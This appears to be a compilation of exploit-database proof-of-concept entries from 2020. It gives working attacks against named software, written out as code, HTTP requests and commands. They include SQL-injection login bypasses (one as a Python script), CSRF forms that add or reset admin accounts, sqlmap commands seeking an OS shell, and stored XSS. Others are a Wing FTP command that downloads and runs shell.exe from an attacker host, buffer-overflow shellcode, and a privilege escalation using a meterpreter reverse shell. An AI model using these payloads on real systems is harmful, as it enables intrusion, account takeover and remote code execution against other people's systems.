Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14946
# Exploit Title: Park Ticketing Management System 1.0 - Authentication Bypass
# Date: 2020-07-13
# Exploit Author: gh1mau
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10952
# Version: V1.0
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)
Vulnerable File:
----------------
/index.php
Vulnerable Code:
-----------------
line 8: $adminuser=$_POST['username'];
Vulnerable Issue:
-----------------
$adminuser=$_POST['username']; has no sanitization
POC User Login:
---------------
URL: http://localhost/ptms/index.php
Username : ' or '1'='1'#
Password : anything
Python POC:
-----------
import requests,re
url = "http://localhost:80/ptms/index.php"
payload = "username=%27+or+%271%27%3D%271%27%23&password=anything&login="
headers = {
"Origin": "http://localhost",
"Cookie": "PHPSESSID=eabmes4rt7uger0dlqsljitjd6",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Connection": "close",
"Referer": "http://localhost/ptms/index.php",
"Host": "localhost",
"Accept-Encoding": "gzip, deflate",
"Upgrade-Insecure-Requests": "1",
"Accept-Language": "en-US,en;q=0.5",
"Content-Length": "80",
"Content-Type": "application/x-www-form-urlencoded"
}
pattern = "PTMS ADMIN"
response = requests.request("POST", url, data=payload, headers=headers)
if re.findall(pattern,response.text):
print("[+] Authentication bypassed using the following payload : " + payload)
else:
print("[!] Something wrong somewhere")
# Exploit Title: SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin)
# Exploit Author: Metin Yunus Kandemir
# Date: 2020-07-15
# Vendor Homepage: https://www.supermicro.com/
# Version: X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
# CVE: CVE-2020-15046
# Source: https://www.totalpentest.com/post/supermicro-ipmi-webgui-cross-site-request-forgery
# Description:
# The web interface on Supermicro X10DRH-iT motherboards with BIOS 2.0a and IPMI firmware 03.40
# allows remote attackers to exploit a cgi/config_user.cgi CSRF issue to add new admin users.
# The fixed versions are BIOS 3.2 and firmware 03.88.
# PoC :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://SuperMicro-IP/cgi/config_user.cgi" method="POST">
<input type="hidden" name="username" value="JOKER" />
<input type="hidden" name="original_username" value="2" />
<input type="hidden" name="password" value="onebadday" />
<input type="hidden" name="new_privilege" value="4" />
<input type="submit" value="submit request" />
</form>
</body>
</html>
# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal
# Date: 2020-06-19
# Exploit Author: Rajivarnan R
# Vendor Homepage: https://www.zyxel.com/
# Software [http://www.zyxelguard.com/WAP6806.asp]
# Version: [V1.00(ABAL.6)C0]
# CVE: 2020-14461
# Tested on: Linux Mint / Windows 10
# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD]
# As a result of the research, one vulnerability identified.
# (Directory Traversal)
# Technical information is provided below step by step.
# [1] - Directory Traversal Vulnerability
# Vulnerable Parameter Type: GET
# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/]
# Proof of Concepts:https://TARGET/Zyxel/images/eaZy/
<https://target/Zyxel/images/eaZy/>
# Exploit Title: Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass
# Date: 2020-07-03
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://github.com/mrzulkarnine/Web-based-hotel-booking-system
# Software Link: https://github.com/mrzulkarnine/Web-based-hotel-
booking-system
# Version: 0.1.0
# Tested on: Kali Linux
Source code(localhost/admin/loginauth.php):
<?php
session_start();
$_SESSION['username'] = $_POST['username'];
$_SESSION['password'] = $_POST['password'];
include './auth.php';
$re = mysql_query("select * from user where
username = '".$_SESSION['username']."' AND password =
'".$_SESSION['password']."' " );
echo mysql_error();
if(mysql_num_rows($re) > 0)
{
header('Refresh: 0;url=dashboard.php');
}
else
{
session_destroy();
header("location: index.htm");
}
?>
Payload:
Username: 1' or 1 = 1 LIMIT 1#
Password: 1' or 1 = 1 LIMIT 1#
# Exploit Title: Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting
# Date: 2020-06-29
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://www.sourcecodester.com/php/14198/online-farm-management-system-phpmysql.html
# Software Link: https://www.campcodes.com/projects/php/249/farm-management-system-in-php-mysql/
# Version: 0.1.0
# Tested on: Kali Linux
Source code(review.php):
<?php
if($result) :
while($row1 = $result->fetch_array()) :
?>
<div class="con">
<div class="row">
<div class="col-sm-4">
<em style="color: black;"><?= $row1['comment']; ?></em>
</div>
POC:
1. http://192.168.1.58/a/review.php?pid=31 go
2. We send the payload (<script>alert(1)</script>)
3. Write a review payload and submit
4. And refresh the page
# Exploit Title: Online Polling System 1.0 - Authentication Bypass
# Date: 2020-07-20
# Author: AppleBois
# Version: NULL
# Software Link: https://www.sourcecodester.com/php/14330/online-polling-system.html
#
# Administration Control Panel || Authentication Bypass
# Unthenticated User perform SQL Injection bypass login mechanism on /admin/checklogin.php
#
######################################################################################
#Vulnerable Code
#
#$myusername=$_POST['myusername'];
#$mypassword=$_POST['mypassword'];
#$encrypted_mypassword=md5($mypassword);
#
#$result=mysqli_query($conn, "SELECT * FROM `tbadministrators` WHERE email='$myusername' and password='$encrypted_mypassword'");
#
#$count=mysqli_num_rows($result);
#
#if($count==1){
#
#$user = mysqli_fetch_assoc($result);
#$_SESSION['member_id'] = $user['member_id'];
#header("location:student.php");
#}
#
######################################################################################
POST /admin/checklogin.php HTTP/1.1
Host: 10.10.10.2:81
Content-Length: 53
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.2:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.10.2:81/online/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ASP.NET_SessionId=vbrb31kd3s5hmz3uobg0smck; UserSettings=language=1; dnn_IsMobile=False; .ASPXANONYMOUS=VA9hDh-1Ldg0FPbBfd9HAWSTqKjasYcZMlHQnpPaoR5WQipK7Q_kKnAlAqfWp0WgtO8HXH2_Tsrhfh-Z7137cng_MeEp3aiMPswVEPZc-UOdZQTp0; __RequestVerificationToken_L0ROTg2=Js5PUWl0BiY3kJLdEPU2oEna_UsEFTrNQiGY986uBwWdRyVDxr2ItTPSUBd07QX6rRyfXQ2; USERNAME_CHANGED=; language=en-US; authentication=DNN; .DOTNETNUKE=CC547735526446773F995D833FACDA646745AE4409516EBF345F1AC725F7D7CE7BFC420BF5EFE9FE2AEC92B04C89CCD2E64C34BA4E195D7D8D6EED7892574DB3FF02599F; ICMSSESSION=mgnp26oubn7hfc590q6j5c9o70; PHPSESSID=1gpgmmltf6uk3ju3aakgd0s8m5
Connection: close
myusername=' or 1=1#&mypassword=ad&Submit=Login
# Exploit Title: Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection
# Date: 2020-06-17
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Vendor Homepage: https://joomsky.com/
# Software Link: https://joomsky.com/products/js-jobs-pro.html
# Change Log (Update) : https://joomsky.com/products/js-jobs.html
# Version: 1.3.0
# Tested on: Kali Linux - Apache2
Vulnerable param: sortby
-------------------------------------------------------------------------
POST /joomla/administrator/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/joomla/administrator/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
Connection: close
Cookie: COOKIES
Upgrade-Insecure-Requests: 1
js_sortby=4&companyname=12&jobtitle=12&location=12&jobcategory=&jobtype=&datefrom=&dateto=&option=com_jsjobs&task=&c=job&view=job&callfrom=jobqueue&layout=jobqueue&sortby=asc&my_click=&boxchecked=0&d90ced5aa929447644f09b56c8d8ba12=1
-------------------------------------------------------------------------
sqlmap poc:
sqlmap -r jsjobs --dbs --risk=3 --level=5 --random-agent -p sortby
Mehmet KELEPÇE
Penetration Tester | Red Team
# Exploit Title: Infor Storefront B2B 1.0 - 'usr_name' SQL Injection
# Google Dork: inurl:storefrontb2bweb
# Date: 2020-06-27
# Exploit Author: ratboy
# Vendor Homepage: https://www.insitesoft.com/infor-storefront/
# Version: Infor Storefront
# Tested on: Windows All Versions
[POC Multiple Vulns]
python sqlmap.py -u
"http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass"
-p usr_name --dbms=mssql --level=5 --risk=3
--tamper=between,space2comment -o --random-agent --parse-errors
--os-shell --technique=ES
python sqlmap.py -u
"http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1"
-p itm_id --dbms=mssql --level=5 --risk=3
--tamper=between,space2comment -o --random-agent --parse-errors
--os-shell --technique=ES
or...
http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass'[SQL
INJECTION];--
http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1'[SQL
INJECTION];--
--
Sincerly,
Aaron Schrom
# Exploit Title: Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)
# Date: 2020-06-26
# Exploit Author: v1n1v131r4
# Vendor Homepage: https://www.wftpserver.com/
# Software Link: https://www.wftpserver.com/download.htm
# Version: 6.3.8
# Tested on: Windows 10
# CVE : --
Wing FTP Server have a web console based on Lua language. For authenticated users, this console can be exploited to obtaining a reverse shell.
1) Generate your payload (e.g. msfvenom)
2) Send and execute via POST
POST /admin_lua_.html?r=0.3592753444724336 HTTP/1.1
Host: 192.168.56.105:5466
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.105:5466/admin_lua_term.html
Content-Type: text/plain;charset=UTF-8
Content-Length: 153
Connection: close
Cookie: admin_lang=english; admin_login_name=admin; UIDADMIN=75e5058fb61a81e427ae86f55794f1f5
command=os.execute('cmd.exe%20%2Fc%20certutil.exe%20-urlcache%20-split%20-f%20http%3A%2F%2F192.168.56.103%2Fshell.exe%20c%3A%5Cshell.exe%20%26shell.exe')
# Exploit Title: Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC)
# Exploit Author: PovlTekstTV
# Date: 2020-07-15
# Vulnerable Software: Simple Startup Manager
# Software Link Download: http://www.ashkon.com/download/startup-manager.exe
# Version: 1.17
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 and 64 bit)
# DEP and ASLR Disabled on system
# Space for shellcode: 264
#!/usr/bin/python
# Two sets of instructions are needed:
# 1. JMP EDI
# 2. JMP EBX
# I found these in the OS-module: SETUPAPI.dll, which is usually protected using ASLR
# The exploit will properly not work unless changed/bruteforced.
# It is also possible to overwrite the SEH-handler with 600+ bytes,
# however I did not find any POP, POP, RETs.
# Walkthrough:
# 1.- Run the python script, it will create a new file "exploit.txt"
# 2.- Copy the content of the new file 'exploit.txt' to clipboard
# 3.- Turn off DEP for startup-manger.exe
# 4.- Open 'startup-manger.exe'
# 5.- Click 'New' or go to 'File' and click 'New'
# 6.- Paste content from clipboard into 'File' parameter
# 7.- Click on 'OK'
# 9.- Calc.exe runs.
#Identified the following badchars: x00 x0a x09 x0c x0d x3a x5c
#msfvenom -p windows/exec cmd=calc.exe -f c -b "\x00\x0a\x0c\x0d\x3a\x5c"
shellcode = ("\xdb\xd0\xd9\x74\x24\xf4\xbe\xcb\xe3\xc2\xa5\x5a\x33\xc9\xb1"
"\x31\x83\xc2\x04\x31\x72\x14\x03\x72\xdf\x01\x37\x59\x37\x47"
"\xb8\xa2\xc7\x28\x30\x47\xf6\x68\x26\x03\xa8\x58\x2c\x41\x44"
"\x12\x60\x72\xdf\x56\xad\x75\x68\xdc\x8b\xb8\x69\x4d\xef\xdb"
"\xe9\x8c\x3c\x3c\xd0\x5e\x31\x3d\x15\x82\xb8\x6f\xce\xc8\x6f"
"\x80\x7b\x84\xb3\x2b\x37\x08\xb4\xc8\x8f\x2b\x95\x5e\x84\x75"
"\x35\x60\x49\x0e\x7c\x7a\x8e\x2b\x36\xf1\x64\xc7\xc9\xd3\xb5"
"\x28\x65\x1a\x7a\xdb\x77\x5a\xbc\x04\x02\x92\xbf\xb9\x15\x61"
"\xc2\x65\x93\x72\x64\xed\x03\x5f\x95\x22\xd5\x14\x99\x8f\x91"
"\x73\xbd\x0e\x75\x08\xb9\x9b\x78\xdf\x48\xdf\x5e\xfb\x11\xbb"
"\xff\x5a\xff\x6a\xff\xbd\xa0\xd3\xa5\xb6\x4c\x07\xd4\x94\x1a"
"\xd6\x6a\xa3\x68\xd8\x74\xac\xdc\xb1\x45\x27\xb3\xc6\x59\xe2"
"\xf0\x39\x10\xaf\x50\xd2\xfd\x25\xe1\xbf\xfd\x93\x25\xc6\x7d"
"\x16\xd5\x3d\x9d\x53\xd0\x7a\x19\x8f\xa8\x13\xcc\xaf\x1f\x13"
"\xc5\xd3\xfe\x87\x85\x3d\x65\x20\x2f\x42")
payload = shellcode
payload += ("A"*(268-len(payload)-4))
payload += ("\xe4\xa9\x4e\x76") #0x764ea9e4 (JMP EBX) {PAGE_READONLY} [SETUPAPI.dll]
payload += ("\x5f\xbc\x4e\x76") #0x764ebc5f (JMP EDI) {PAGE_READONLY} [SETUPAPI.dll]
#Write payload to file
file = open("exploit.txt" , 'w')
file.write(payload)
file.close()
# Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Date: 2020-05-31
# Exploit Author: Noth
# Vendor Homepage: https://github.com/boiteasite/cmsuno
# Software Link: https://github.com/boiteasite/cmsuno
# Version: v1.6
# CVE : 2020-15600
An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.
PoC :
<html>
<body>
<script>history.pushState(",",'/')</script>
<form action=“http://127.0.0.1/cmsuno-master/uno.php”method=“POST”>
<input type=“hidden” name=“user” value=“admin”/>
<input type=“hidden” name=“pass” value=“yourpassword”/>
<input type=“submit” name=“user” value=“Submit request”/>
</form>
</body>
</html>
# Title: Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path
# Author: Velayutham Selvaraj
# Date: 2020-06-03
# Vendor Homepage: https://www.sonarqube.org
# Software Link: https://www.sonarqube.org/downloads/
# Version : 8.3.1
# Tested on: Windows 10 64bit(EN)
About Unquoted Service Path :
==============================
When a service is created whose executable path contains spaces and isn't
enclosed within quotes,
leads to a vulnerability known as Unquoted Service Path which allows a user
to gain SYSTEM privileges.
(only if the vulnerable service is running with SYSTEM privilege level
which most of the time it is).
Steps to recreate :
=============================
1. Open CMD and Check for USP vulnerability by typing [ wmic service get
name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v
"c:\windows\\" | findstr /i /v """ ]
2. The Vulnerable Service would Show up.
3. Check the Service Permissions by typing [ sc qc SonarQube]
4. The command would return..
C:\Users\HP-840-G2-ELITEBOOK>sc qc SonarQube
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SonarQube
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME :
C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\bin\windows-x86-64\wrapper.exe
-s
C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\conf\wrapper.conf
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SonarQube
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
5. This concludes that the service is running as SYSTEM. "Highest
privilege in a machine"
6. Now create a Payload with msfvenom or other tools and name it to
wrapper.exe
7. Make sure you have write Permissions to where you downloaded. i kept it
in downloads folders but confirmed it in program files as well.
8. Provided that you have right permissions, Drop the wrapper.exe
executable you created into the
"C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\bin\windows-x86-64\"
Directory.
9. Now restart the IObit Uninstaller service by giving coommand [ sc stop
SonarQube] followed by [ sc start SonarQube]
10. If your payload is created with msfvenom, quickly migrate to a
different process. [Any process since you have the SYSTEM Privilege].
During my testing :
Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o wrapper.exe
Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a
different Process ]